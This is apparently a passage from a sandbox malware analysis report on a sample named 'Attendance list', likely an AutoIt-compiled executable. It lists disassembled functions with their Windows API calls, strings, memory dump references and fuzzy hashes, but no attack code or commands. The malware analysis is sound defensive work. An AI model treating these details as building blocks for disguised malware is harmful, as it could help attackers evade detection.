                        Function 009380A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0093830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009380C8,?,00000000,?,?), ref: 00938322
                        • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009380CB
                        • htons.WSOCK32(00000000,?,00000000), ref: 00938108
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ByteCharMultiWidehtonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 2496851823-2422070025
                        • Opcode ID: 955b52a04756339e0445f2c00d913facd97efa14e225892f3a3c92660779cbe6
                        • Instruction ID: 129265942a5b4932922220bcef1c9fc0aa00b3e7e18f26f86eba6000c5ee0cc6
                        • Opcode Fuzzy Hash: 955b52a04756339e0445f2c00d913facd97efa14e225892f3a3c92660779cbe6
                        • Instruction Fuzzy Hash: 2B110434604309ABCB20AFA4CC86FFEB374FF44320F10852AF91197291DB72A855CB95
                        Function 009192E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00919355
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        • Opcode ID: a931c89f00442f759e3041f0650ac6ec5cb0b1447e7db9aa9b019d8e50145c6e
                        • Instruction ID: f9a382db8458d6e55339f0f8bfe2bb950c139a2a37653c9a9e1b2a1cf8d65d5b
                        • Opcode Fuzzy Hash: a931c89f00442f759e3041f0650ac6ec5cb0b1447e7db9aa9b019d8e50145c6e
                        • Instruction Fuzzy Hash: 6A019271A05228AB8B08EB64CCA1DFE7769FF46360B140659B832972D1DE3159489651
                        Function 009191DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 0091924D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        • Opcode ID: 4a4add757f81a360512f38db9a0a1fb15c5463e864a4a57608aaf1ffbc15a317
                        • Instruction ID: 4bde172bf5122d0e4548b267f15b0f19d0890e4982b3dbfc7bedea1d6d8c661a
                        • Opcode Fuzzy Hash: 4a4add757f81a360512f38db9a0a1fb15c5463e864a4a57608aaf1ffbc15a317
                        • Instruction Fuzzy Hash: BD018871B411187BCF04E7A4C9A2EFF73ACEF45340F140559792667181DE25AE489662
                        Function 00919264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 009192D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        • Opcode ID: e29050746d4c59ad28bde27d6acef031ff9aafb03514a098b534cbf276c820bf
                        • Instruction ID: eb9a0b5c25fd716eadc71265eef4364151d0d781838c225eda0a0e21f73be4e1
                        • Opcode Fuzzy Hash: e29050746d4c59ad28bde27d6acef031ff9aafb03514a098b534cbf276c820bf
                        • Instruction Fuzzy Hash: F001A271B4111C7BCF04EAA4C992EFF77ACEF15340F240519B826A3282DE359E489672
                        Function 009251CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClassName_wcscmp
                        • String ID: #32770
                        • API String ID: 2292705959-463685578
                        • Opcode ID: 4f50706acf959944d2f65c1245bca1a309933015dcec5d4135b1e074f90fed0c
                        • Instruction ID: 78691369a8fc508e94dfab2fa00a43aa1c466d9acbf6439d2a2cc0e6e3fa9e7b
                        • Opcode Fuzzy Hash: 4f50706acf959944d2f65c1245bca1a309933015dcec5d4135b1e074f90fed0c
                        • Instruction Fuzzy Hash: F5E02232A042296BE3209A99AC09EABF7ACEB81721F00006AF924D3040E5609A048BE1
                        Function 009181BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                        Download Yara Rule
                        APIs
                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009181CA
                          • Part of subcall function 008E3598: _doexit.LIBCMT ref: 008E35A2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Message_doexit
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 1993061046-4017498283
                        • Opcode ID: e9eb1e2e6cecf31974ab6c023f0724175b332e542ea21a7f6e10881eecd8fa6d
                        • Instruction ID: 7ce6bfcd0242d9420ee1634fd50e1d4454902af579dd5040d5ea6913c3133dd4
                        • Opcode Fuzzy Hash: e9eb1e2e6cecf31974ab6c023f0724175b332e542ea21a7f6e10881eecd8fa6d
                        • Instruction Fuzzy Hash: 3BD012323C576832D25473A96C0AFD675489B06B56F004415BB08955D389E299C1529A
                        Function 008FB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008FB564: _memset.LIBCMT ref: 008FB571
                          • Part of subcall function 008E0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008FB540,?,?,?,008C100A), ref: 008E0B89
                        • IsDebuggerPresent.KERNEL32(?,?,?,008C100A), ref: 008FB544
                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008C100A), ref: 008FB553
                        Strings
                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008FB54E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                        • API String ID: 3158253471-631824599
                        • Opcode ID: 8009ef520c045d615c71ad3e276cb7d6d89bd66ae647dbf0c8271734c964c716
                        • Instruction ID: d0f7da58fb7d5c7f3c747fb3d37b7df7cea0db8a79bbc90e5e5ebc4a3d5563db
                        • Opcode Fuzzy Hash: 8009ef520c045d615c71ad3e276cb7d6d89bd66ae647dbf0c8271734c964c716
                        • Instruction Fuzzy Hash: FDE06D74214B168BD321DF38E4047527BE0FB04758F00893DE556C7250E7B9D448DB61
                        Function 00945BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00945BF5
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00945C08
                          • Part of subcall function 009254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0092555E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: fbe545f04bf6c3b0f95f7e7877fc43e8849f21ff62ce01dfcd7a51ec1c775960
                        • Instruction ID: 103cad6b659b94ece6810647911adaa488c43b08e8de9f6925d876538859a172
                        • Opcode Fuzzy Hash: fbe545f04bf6c3b0f95f7e7877fc43e8849f21ff62ce01dfcd7a51ec1c775960
                        • Instruction Fuzzy Hash: EDD0123639C312B7E774BB70BC1FFE76A14AB81B51F014835B749AA1E1D9F45800D650